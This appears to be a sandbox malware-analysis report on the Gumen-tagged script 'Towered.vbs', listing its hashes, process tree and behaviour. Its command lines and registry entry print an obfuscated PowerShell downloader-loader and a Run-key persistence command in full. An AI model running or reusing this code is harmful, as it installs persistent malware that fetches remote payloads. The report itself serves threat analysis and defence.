File name:

Towered.vbs

Full analysis: https://app.any.run/tasks/89075749-69e1-44fa-b697-143c9f376b58
Verdict: Malicious activity
Analysis date: November 20, 2024, 07:07:04
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
gumen
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

4BDC3A0F5DE043DC8B4D66E074ECB39D

SHA1:

46112E4C9B252673E65DA63D5D986B238DE8601F

SHA256:

B7EB907DA15FA184A1B81730F41B3DFC46A91D24A92AA4C132A6204421A910F7

SSDEEP:

768:f9xg8xZSki9VAulLUbUcO7VNoptqYhAtf0C3MEdTd4OFv:T3SxlJjopPyka

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • GUMEN has been detected

      • powershell.exe (PID: 3608)
      • powershell.exe (PID: 6032)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 5696)
    • Base64-obfuscated command line is found

      • wscript.exe (PID: 5696)
    • Starts CMD.EXE for commands execution

      • msiexec.exe (PID: 5752)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 2292)
  • INFO

    • The process uses the downloaded file

      • wscript.exe (PID: 5696)
    • Manual execution by a user

      • powershell.exe (PID: 3608)
    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 5696)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes
125
Monitored processes
10
Malicious processes
2
Suspicious processes
1

Behavior graph

start wscript.exe no specs #GUMEN powershell.exe conhost.exe no specs svchost.exe #GUMEN powershell.exe no specs conhost.exe no specs msiexec.exe cmd.exe no specs conhost.exe no specs reg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
PID: 2192
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 2292
CMD: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Assheadedness% -windowstyle 1 $Brneteaters=(gp -Path 'HKCU:\Software\Appendicial\').Regnskabschefens;%Assheadedness% ($Brneteaters)"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: msiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
3608"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Ennobles Systemadministratorernes oocyesis Vellysten Undiminutive #><#Sektion Cykelsports Audienssalens Shoggly Hjkommisrer Tarcel #>$Underlets='Featureugen';function Klippesten($Slibrige){If ($host.DebuggerEnabled) {$Schucht=5} for ($Witherdeed=$Schucht;;$Witherdeed+=6){if(!$Slibrige[$Witherdeed]) { break }$Snakken+=$Slibrige[$Witherdeed]}$Snakken}function afsave($Kalderne){ .($Sociolegal) ($Kalderne)}$Besejler=Klippesten 'brofaN HauteUnemeTMelle.Af,alwtestieSmuglbToko.c S.gelMel pi npereM gsbnFjernT';$Thesauris=Klippesten 'OvuleMEnemaoUanbrzFro tiEmp rlCard lPat ia Engr/';$supersubtle=Klippesten 'Ka.trTdiffelHatchsStump1Aphic2';$Kastepils='Montg[MandrNHundrEBen.et Gryd.A.topsSch.megounarsibylvParkeIDiffeCBindsELimosPVovhuoPerspi pa,iNMe,iltGastrmFemeuA Overnveuvea ThisgVarmeeNedrurKirur],oinc:Acced:KvadrsInterEIn.enc Res U Un,frKlynki ForbTGrundyH nnipUndelr In,eOkapactKonsuoAfsniCSwi.goSansal.vorn=Forur$AccomSM sopUfulliPP,laeE idaxrJarn SSeignuunde BFrivotf jlpL ,eteE';$Thesauris+=Klippesten ' Blad5Myc t.Bogb.0 Feif B.udu( UspnWFor liuneffnli.usdUnsatoDisulwS inasParan At,iuN uffeTCrina domin1Oospo0Lavpa. Subs0Blyan;Svenn Hy.eWCleariExternForsk6Rable4P aka;Paner I,lusxChemo6Skill4Bundr;Sj.es Tryklr UnanvUnder:Uncog1Dagdr3 Mate1Is an.bolig0A.ylo)Buffe S.rvGFrasteVicuscSavi kB.sttoDistr/Tyd i2 Alts0Fyrin1Ballh0hesth0 Kle 1Santo0Infel1bista AmoroFMode iRhizor evomeRes.mfAttraoGarnix Lret/Man,a1Speci3Athyr1Ene r. Va,l0';$Snufflingly=Klippesten 'nonimUM galSRat.beBrandRLegen-Tumblasali gUdtapEso guNF milT';$Flgevirkningen=Klippesten 'AfmilhKl.sttRovdyttermip EophsFartg:Nucle/stnkp/EftersWasheh DeviaTilbalUnconoTilbjuGramoxBlasftAlban.SnusftSbesroSk lepDrill/ SlarUDrumfnRealedFodg,e s blr DriksFi teh DissoFarimozi.cot platiMedicnFiligg Op r. RetrhRedethUdgank Farv> BranhUriditFriaktscoinp bo tsScorc: Marm/Ru bl/Spleuo airllD,garaSuccemLit.ol cau.t .ortdSky.e. 
FirstLe tioTrykkpcirku/D,lfiUH melnEquildStedmeNo derTi,nrs Frsth.enteobivouoSovjet dlerijournnFluorgKlger.DavenhCaus h Dib k';$Skurebrste=Klippesten 'Nonad>';$Sociolegal=Klippesten 'Inkari ondoeSammeX';$Lithically='Antimilitaristers';$Sciosophist='\Harmonicas.Pre';afsave (Klippesten 'Skide$ AfhoGNearcLAubrioB dgrBH.vedAS.eurl sush: ssaoK Pat O,jtrynGe,thFSoldeEKdetcREnk lCBuegaEHyperr Sama=Finge$ Lyc eOve.dn InclV Hnge:Sha pAF,mlepCopr pRenseDExa cAJuve TA chdaLob.l+Ditzi$SkattsSebbeCseqfciEncefOApicaSStrkmo ExtePAutarhAtro iUndlasEpokeT');afsave (Klippesten 'Opadb$To,meGSamselDeiceOKnoglbL boraBi grLIltfa:MalteACartsr Va rMPulveERib erPythoE aalDBenn eTag.t=Flj s$Kl ptfBegreLSu jeGHeralELrerivDomstIDisquRnoncokCa amNCoralI InvaNlamstgEcc oEUnwelNFodba.Asf,lsDildsP FastlYndl iAfpattHuser( Barm$ lageSBegunk DiplUCommir CoffeImushBm binrForbrsmodentSabbaePostu)');afsave (Klippesten $Kastepils);$Flgevirkningen=$Armerede[0];$Hyperstoical=(Klippesten 'Emm r$ ypecgBef,lLXer.pOAfghabSilu.aUnderlSynta:Sae,gbKabelR A fiARangsnCetacdPja ksOscartUnderAM llet ,eriI InveoLedi.NallineGouterT ingStranl= r guN Le.se,okkeWminds- PlayO Unc bCrassj.nsekETrom cAd ostSpydk B oknS PerpYR,vigSScragt Apose SovsMLetha.Urte,$Svansb GlosEP.earSLas aEMedicjCarryLUn,ere orneR');afsave ($Hyperstoical);afsave (Klippesten 'Trail$Detr B Ilpar OptaaTarmrnRegn,dRe.orsContrt .angaTilsytTran.iI,genoBesnrnVarekeUnprorAc uisTvrfa.BobleHYaponeStandaAntipd ForseRenrirColossC rtw[Budge$Sk.kkSInbitnreequu,ychefAn,elf.dhnglOrgieiDise,nSi,ulg F uslDyr myIndsk]Sparr= Back$PredeT Saldh SeroeSawbusFi.saaA,toeuBallerCassoi Hjers');$Euros=Klippesten 'Syn h$Thor,BMis.brDaaseaDexionbattedHo,chsLgnagtKon oaBagrut Un aiOplb oN vnknf.ldkeRuacurSt kos Dr v.BilleDInfido Cer wBi ian Raasl K,afoLinolaFiletd b keFVar.aiTithelParele Sa,b(Hyper$ oregFKokkel Ejb gSpideeNonupvBatisi Dv irReviskB,tjen Behnimagnin inclgSnoreeBega n Trol, arqu$Ra kfPHawsee SavvrAkt rf Skrio PagtrH vedaDi trtkiasbiAlgernUndevg 
and1Servi7Audio5Mokka)';$Perforating175=$Konfercer;afsave (Klippesten 'Whi,t$ P.ojgSnderlTwierOnonreB SyltAAfbenlTinam:MumneG Bnder Um eaUnde PHengiHBon oi ilmgc Bags= Niss(SpermTG.apiE Udl SsupplTUmenn- I dkPVolu,AVisitTPropohCifre Sight$WafflPDkkete BvreRHarrofhjemmo DonerBihulaEt erTDow sI talnAlterg Hous1 Dunj7 Arct5 onol)');while (!$Graphic) {afsave (Klippesten 'tric $StendgAarp.lCommaoProexbAnkeraJu kelvgter:ChresSVakuup ildeoPositrTinekv S.uloMechigFidlenRegiosWicopkRebouo Obstn usindModk,urea,mkintert G llr.erroeDagklnmatth=K dmi$Unre,S S amt Ph.eyFilatr Slagt VermeMega.gVagraoMottodTheats') ;afsave $Euros;afsave (Klippesten 'NonmesWilleTStovtA TortrRunolTTroug-FlyveSMerchLRandieHemateBarriP ers ewwo4');afsave (Klippesten 'Unsad$IntragRelstLNoncoOInfe BRe onaR gnbLByssu: Teksg allRmodelAskrotp ForsHEllysiStramcRevan=Temat( DrenTWaybiEHofmasNeph tDolke-Forl P Bipla Po zTBekomH jer Teleo$OyvinPJernbeafhopRAfs af PersoStrykrBri tAPanf TAlkylIBasopNVelatgFor.r1Neuro7Autos5Ancie)') ;afsave (Klippesten 'B,nem$kodesGUnderlart foOutecbLftpiASenenlStrmp:ToskiI ove n,ropugLizetEPhycoNEpi.rILigniR Sys,a FlygkP,eliAGlittD St.neOver M S ifiMaane=Recou$NedbrG Id oL SgeoO angB inieA sjleLDesig:Unc.rbPjatglDismiK MandK Fny eBegletConco+ prec+N,zit%Aviar$Pa,soaHaemoR yroMcy loEAristr EfteEAnte.dUds reGrund.UnnoocSolvooSophiuSkyndn menaT') ;$Flgevirkningen=$Armerede[$Ingenirakademi]}$Generindringsvelser=283334;$ekvilibrismen=32997;afsave (Klippesten 'M stn$ElvilGLibrilSjas oHammeBUn ubABrazilpr.ve:P attu ne,kdExplosOri lUUni.sgK rrenA delIAtoleNSubarGV jle Sgem=Tatou Mor,eGtubemeRidebtRati -FuldbcShopbOIsox n FirdTLynghEInstrnFnatmtBrne Hon,s$RegnepSt liEYe leRBumleF BiwioK,tchrLithaaFo krTGo.ssIA derN HurrgHyper1Nonro7rippl5');afsave (Klippesten 'Debr.$unpalgCo,pul Twiso K.llbHjteka PomplDrank:OrdurFTrff,o C,rrx Fulmg paavlDynamoForgavFoupoeNestlsTummi Gra h= rady Oxhi[ Un.aSNoneqySdvansCathot Hypoeblue,m Sl.t. 
ortCRambloAd.annEksigv .nkmeFor erGangltMacre] M.th:seedi:Uimo F .orur SkatoFor,tmBygbaB ilanaSquinsVaporeHaste6Forbe4LdervSQuin tBa.otrKoblei Mot nbitangKl rg(Nasal$GammaU nindKvasssgle nuStricgRkedanMollui Neo.n.laggg Entr)');afsave (Klippesten 'Fusio$AngreGOkkullNonalO m teBErgosaLiggelUnsen:Tama.hFremkECe trX SinnAArbejn red.G,tandu onomLComprAPengerkokst Gedes= Atte Krypt[M rblsLudlaypulstSLasertBoj.teBryd M S sa.Go siTDekupeJa,atX EdsfTStvko.PodsoeCykelNKa khc ForsO DisrdUnfisI ,revNRatteGletva]blati: Okku:P dotALi rdS Pa sc meriISttediScrim.Nedstg ZoomeAdrttT amsts Po nT reicRIntelIPrestNSightgColor(Domin$MaskiFOvernOI ebeX Jarbg enal InseOchontvBarkpeSinl,sWitho)');afsave (Klippesten 'Enren$LngodGOpv,rLS orsO Qu rb D,ciaUnconL Kont:PaniceBetracShagbhTrombOO arbWHibbeI Hur s MisieNevad=filmb$ ThiohUindbeChaldxBaandAFlowenH ndlGHai wUTeeuplTyndsAR marrOutdr.OverpsAnacluGeoloBOm,gnSExcoet.jergRAnnelIK ppenT vejGC unt( Warw$ TittG MartEFrihoNBorgee Ha,rROpseniD.conNTrugmdTeater,tueuIKethiN HyldgPrintsFigwoV,reckelignolNohowSShre ETheo,rDusto,Krite$Mi,roE LkkeKCrossvMilliIn,nliloplriiSinusb FornR FrasiHerp SKrateMStoplEBan nNTystn)');afsave $Echowise;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 4348
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 5444
CMD: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Assheadedness% -windowstyle 1 $Brneteaters=(gp -Path 'HKCU:\Software\Appendicial\').Regnskabschefens;%Assheadedness% ($Brneteaters)"
Path: C:\Windows\SysWOW64\reg.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
PID: 5496
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 5696
CMD: "C:\WINDOWS\System32\WScript.exe" C:\Users\admin\Desktop\Towered.vbs
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 5752
CMD: "C:\WINDOWS\SysWOW64\msiexec.exe"
Path: C:\Windows\SysWOW64\msiexec.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\certmgr.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
PID: 5832
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6032"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ennobles Systemadministratorernes oocyesis Vellysten Undiminutive #><#Sektion Cykelsports Audienssalens Shoggly Hjkommisrer Tarcel #>$Underlets='Featureugen';function Klippesten($Slibrige){If ($host.DebuggerEnabled) {$Schucht=5} for ($Witherdeed=$Schucht;;$Witherdeed+=6){if(!$Slibrige[$Witherdeed]) { break }$Snakken+=$Slibrige[$Witherdeed]}$Snakken}function afsave($Kalderne){ .($Sociolegal) ($Kalderne)}$Besejler=Klippesten 'brofaN HauteUnemeTMelle.Af,alwtestieSmuglbToko.c S.gelMel pi npereM gsbnFjernT';$Thesauris=Klippesten 'OvuleMEnemaoUanbrzFro tiEmp rlCard lPat ia Engr/';$supersubtle=Klippesten 'Ka.trTdiffelHatchsStump1Aphic2';$Kastepils='Montg[MandrNHundrEBen.et Gryd.A.topsSch.megounarsibylvParkeIDiffeCBindsELimosPVovhuoPerspi pa,iNMe,iltGastrmFemeuA Overnveuvea ThisgVarmeeNedrurKirur],oinc:Acced:KvadrsInterEIn.enc Res U Un,frKlynki ForbTGrundyH nnipUndelr In,eOkapactKonsuoAfsniCSwi.goSansal.vorn=Forur$AccomSM sopUfulliPP,laeE idaxrJarn SSeignuunde BFrivotf jlpL ,eteE';$Thesauris+=Klippesten ' Blad5Myc t.Bogb.0 Feif B.udu( UspnWFor liuneffnli.usdUnsatoDisulwS inasParan At,iuN uffeTCrina domin1Oospo0Lavpa. Subs0Blyan;Svenn Hy.eWCleariExternForsk6Rable4P aka;Paner I,lusxChemo6Skill4Bundr;Sj.es Tryklr UnanvUnder:Uncog1Dagdr3 Mate1Is an.bolig0A.ylo)Buffe S.rvGFrasteVicuscSavi kB.sttoDistr/Tyd i2 Alts0Fyrin1Ballh0hesth0 Kle 1Santo0Infel1bista AmoroFMode iRhizor evomeRes.mfAttraoGarnix Lret/Man,a1Speci3Athyr1Ene r. Va,l0';$Snufflingly=Klippesten 'nonimUM galSRat.beBrandRLegen-Tumblasali gUdtapEso guNF milT';$Flgevirkningen=Klippesten 'AfmilhKl.sttRovdyttermip EophsFartg:Nucle/stnkp/EftersWasheh DeviaTilbalUnconoTilbjuGramoxBlasftAlban.SnusftSbesroSk lepDrill/ SlarUDrumfnRealedFodg,e s blr DriksFi teh DissoFarimozi.cot platiMedicnFiligg Op r. RetrhRedethUdgank Farv> BranhUriditFriaktscoinp bo tsScorc: Marm/Ru bl/Spleuo airllD,garaSuccemLit.ol cau.t .ortdSky.e. 
FirstLe tioTrykkpcirku/D,lfiUH melnEquildStedmeNo derTi,nrs Frsth.enteobivouoSovjet dlerijournnFluorgKlger.DavenhCaus h Dib k';$Skurebrste=Klippesten 'Nonad>';$Sociolegal=Klippesten 'Inkari ondoeSammeX';$Lithically='Antimilitaristers';$Sciosophist='\Harmonicas.Pre';afsave (Klippesten 'Skide$ AfhoGNearcLAubrioB dgrBH.vedAS.eurl sush: ssaoK Pat O,jtrynGe,thFSoldeEKdetcREnk lCBuegaEHyperr Sama=Finge$ Lyc eOve.dn InclV Hnge:Sha pAF,mlepCopr pRenseDExa cAJuve TA chdaLob.l+Ditzi$SkattsSebbeCseqfciEncefOApicaSStrkmo ExtePAutarhAtro iUndlasEpokeT');afsave (Klippesten 'Opadb$To,meGSamselDeiceOKnoglbL boraBi grLIltfa:MalteACartsr Va rMPulveERib erPythoE aalDBenn eTag.t=Flj s$Kl ptfBegreLSu jeGHeralELrerivDomstIDisquRnoncokCa amNCoralI InvaNlamstgEcc oEUnwelNFodba.Asf,lsDildsP FastlYndl iAfpattHuser( Barm$ lageSBegunk DiplUCommir CoffeImushBm binrForbrsmodentSabbaePostu)');afsave (Klippesten $Kastepils);$Flgevirkningen=$Armerede[0];$Hyperstoical=(Klippesten 'Emm r$ ypecgBef,lLXer.pOAfghabSilu.aUnderlSynta:Sae,gbKabelR A fiARangsnCetacdPja ksOscartUnderAM llet ,eriI InveoLedi.NallineGouterT ingStranl= r guN Le.se,okkeWminds- PlayO Unc bCrassj.nsekETrom cAd ostSpydk B oknS PerpYR,vigSScragt Apose SovsMLetha.Urte,$Svansb GlosEP.earSLas aEMedicjCarryLUn,ere orneR');afsave ($Hyperstoical);afsave (Klippesten 'Trail$Detr B Ilpar OptaaTarmrnRegn,dRe.orsContrt .angaTilsytTran.iI,genoBesnrnVarekeUnprorAc uisTvrfa.BobleHYaponeStandaAntipd ForseRenrirColossC rtw[Budge$Sk.kkSInbitnreequu,ychefAn,elf.dhnglOrgieiDise,nSi,ulg F uslDyr myIndsk]Sparr= Back$PredeT Saldh SeroeSawbusFi.saaA,toeuBallerCassoi Hjers');$Euros=Klippesten 'Syn h$Thor,BMis.brDaaseaDexionbattedHo,chsLgnagtKon oaBagrut Un aiOplb oN vnknf.ldkeRuacurSt kos Dr v.BilleDInfido Cer wBi ian Raasl K,afoLinolaFiletd b keFVar.aiTithelParele Sa,b(Hyper$ oregFKokkel Ejb gSpideeNonupvBatisi Dv irReviskB,tjen Behnimagnin inclgSnoreeBega n Trol, arqu$Ra kfPHawsee SavvrAkt rf Skrio PagtrH vedaDi trtkiasbiAlgernUndevg 
and1Servi7Audio5Mokka)';$Perforating175=$Konfercer;afsave (Klippesten 'Whi,t$ P.ojgSnderlTwierOnonreB SyltAAfbenlTinam:MumneG Bnder Um eaUnde PHengiHBon oi ilmgc Bags= Niss(SpermTG.apiE Udl SsupplTUmenn- I dkPVolu,AVisitTPropohCifre Sight$WafflPDkkete BvreRHarrofhjemmo DonerBihulaEt erTDow sI talnAlterg Hous1 Dunj7 Arct5 onol)');while (!$Graphic) {afsave (Klippesten 'tric $StendgAarp.lCommaoProexbAnkeraJu kelvgter:ChresSVakuup ildeoPositrTinekv S.uloMechigFidlenRegiosWicopkRebouo Obstn usindModk,urea,mkintert G llr.erroeDagklnmatth=K dmi$Unre,S S amt Ph.eyFilatr Slagt VermeMega.gVagraoMottodTheats') ;afsave $Euros;afsave (Klippesten 'NonmesWilleTStovtA TortrRunolTTroug-FlyveSMerchLRandieHemateBarriP ers ewwo4');afsave (Klippesten 'Unsad$IntragRelstLNoncoOInfe BRe onaR gnbLByssu: Teksg allRmodelAskrotp ForsHEllysiStramcRevan=Temat( DrenTWaybiEHofmasNeph tDolke-Forl P Bipla Po zTBekomH jer Teleo$OyvinPJernbeafhopRAfs af PersoStrykrBri tAPanf TAlkylIBasopNVelatgFor.r1Neuro7Autos5Ancie)') ;afsave (Klippesten 'B,nem$kodesGUnderlart foOutecbLftpiASenenlStrmp:ToskiI ove n,ropugLizetEPhycoNEpi.rILigniR Sys,a FlygkP,eliAGlittD St.neOver M S ifiMaane=Recou$NedbrG Id oL SgeoO angB inieA sjleLDesig:Unc.rbPjatglDismiK MandK Fny eBegletConco+ prec+N,zit%Aviar$Pa,soaHaemoR yroMcy loEAristr EfteEAnte.dUds reGrund.UnnoocSolvooSophiuSkyndn menaT') ;$Flgevirkningen=$Armerede[$Ingenirakademi]}$Generindringsvelser=283334;$ekvilibrismen=32997;afsave (Klippesten 'M stn$ElvilGLibrilSjas oHammeBUn ubABrazilpr.ve:P attu ne,kdExplosOri lUUni.sgK rrenA delIAtoleNSubarGV jle Sgem=Tatou Mor,eGtubemeRidebtRati -FuldbcShopbOIsox n FirdTLynghEInstrnFnatmtBrne Hon,s$RegnepSt liEYe leRBumleF BiwioK,tchrLithaaFo krTGo.ssIA derN HurrgHyper1Nonro7rippl5');afsave (Klippesten 'Debr.$unpalgCo,pul Twiso K.llbHjteka PomplDrank:OrdurFTrff,o C,rrx Fulmg paavlDynamoForgavFoupoeNestlsTummi Gra h= rady Oxhi[ Un.aSNoneqySdvansCathot Hypoeblue,m Sl.t. 
ortCRambloAd.annEksigv .nkmeFor erGangltMacre] M.th:seedi:Uimo F .orur SkatoFor,tmBygbaB ilanaSquinsVaporeHaste6Forbe4LdervSQuin tBa.otrKoblei Mot nbitangKl rg(Nasal$GammaU nindKvasssgle nuStricgRkedanMollui Neo.n.laggg Entr)');afsave (Klippesten 'Fusio$AngreGOkkullNonalO m teBErgosaLiggelUnsen:Tama.hFremkECe trX SinnAArbejn red.G,tandu onomLComprAPengerkokst Gedes= Atte Krypt[M rblsLudlaypulstSLasertBoj.teBryd M S sa.Go siTDekupeJa,atX EdsfTStvko.PodsoeCykelNKa khc ForsO DisrdUnfisI ,revNRatteGletva]blati: Okku:P dotALi rdS Pa sc meriISttediScrim.Nedstg ZoomeAdrttT amsts Po nT reicRIntelIPrestNSightgColor(Domin$MaskiFOvernOI ebeX Jarbg enal InseOchontvBarkpeSinl,sWitho)');afsave (Klippesten 'Enren$LngodGOpv,rLS orsO Qu rb D,ciaUnconL Kont:PaniceBetracShagbhTrombOO arbWHibbeI Hur s MisieNevad=filmb$ ThiohUindbeChaldxBaandAFlowenH ndlGHai wUTeeuplTyndsAR marrOutdr.OverpsAnacluGeoloBOm,gnSExcoet.jergRAnnelIK ppenT vejGC unt( Warw$ TittG MartEFrihoNBorgee Ha,rROpseniD.conNTrugmdTeater,tueuIKethiN HyldgPrintsFigwoV,reckelignolNohowSShre ETheo,rDusto,Krite$Mi,roE LkkeKCrossvMilliIn,nliloplriiSinusb FornR FrasiHerp SKrateMStoplEBan nNTystn)');afsave $Echowise;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
14 250
Read events
14 247
Write events
3
Delete events
0

Modification events

(PID) Process: (5752) msiexec.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Appendicial
Operation: write
Name: Regnskabschefens
Value:
<#Ennobles Systemadministratorernes oocyesis Vellysten Undiminutive #><#Sektion Cykelsports Audienssalens Shoggly Hjkommisrer Tarcel #>$Underlets='Featureugen';function Klippesten($Slibrige){If ($host.DebuggerEnabled) {$Schucht=5} for ($Witherdeed=$Schucht;;$Witherdeed+=6){if(!$Slibrige[$Witherdeed]) { break }$Snakken+=$Slibrige[$Witherdeed]}$Snakken}function afsave($Kalderne){ .($Sociolegal) ($Kalderne)}$Besejler=Klippesten 'brofaN HauteUnemeTMelle.Af,alwtestieSmuglbToko.c S.gelMel pi npereM gsbnFjernT';$Thesauris=Klippesten 'OvuleMEnemaoUanbrzFro tiEmp rlCard lPat ia Engr/';$supersubtle=Klippesten 'Ka.trTdiffelHatchsStump1Aphic2';$Kastepils='Montg[MandrNHundrEBen.et Gryd.A.topsSch.megounarsibylvParkeIDiffeCBindsELimosPVovhuoPerspi pa,iNMe,iltGastrmFemeuA Overnveuvea ThisgVarmeeNedrurKirur],oinc:Acced:KvadrsInterEIn.enc Res U Un,frKlynki ForbTGrundyH nnipUndelr In,eOkapactKonsuoAfsniCSwi.goSansal.vorn=Forur$AccomSM sopUfulliPP,laeE idaxrJarn SSeignuunde BFrivotf jlpL ,eteE';$Thesauris+=Klippesten ' Blad5Myc t.Bogb.0 Feif B.udu( UspnWFor liuneffnli.usdUnsatoDisulwS inasParan At,iuN uffeTCrina domin1Oospo0Lavpa. Subs0Blyan;Svenn Hy.eWCleariExternForsk6Rable4P aka;Paner I,lusxChemo6Skill4Bundr;Sj.es Tryklr UnanvUnder:Uncog1Dagdr3 Mate1Is an.bolig0A.ylo)Buffe S.rvGFrasteVicuscSavi kB.sttoDistr/Tyd i2 Alts0Fyrin1Ballh0hesth0 Kle 1Santo0Infel1bista AmoroFMode iRhizor evomeRes.mfAttraoGarnix 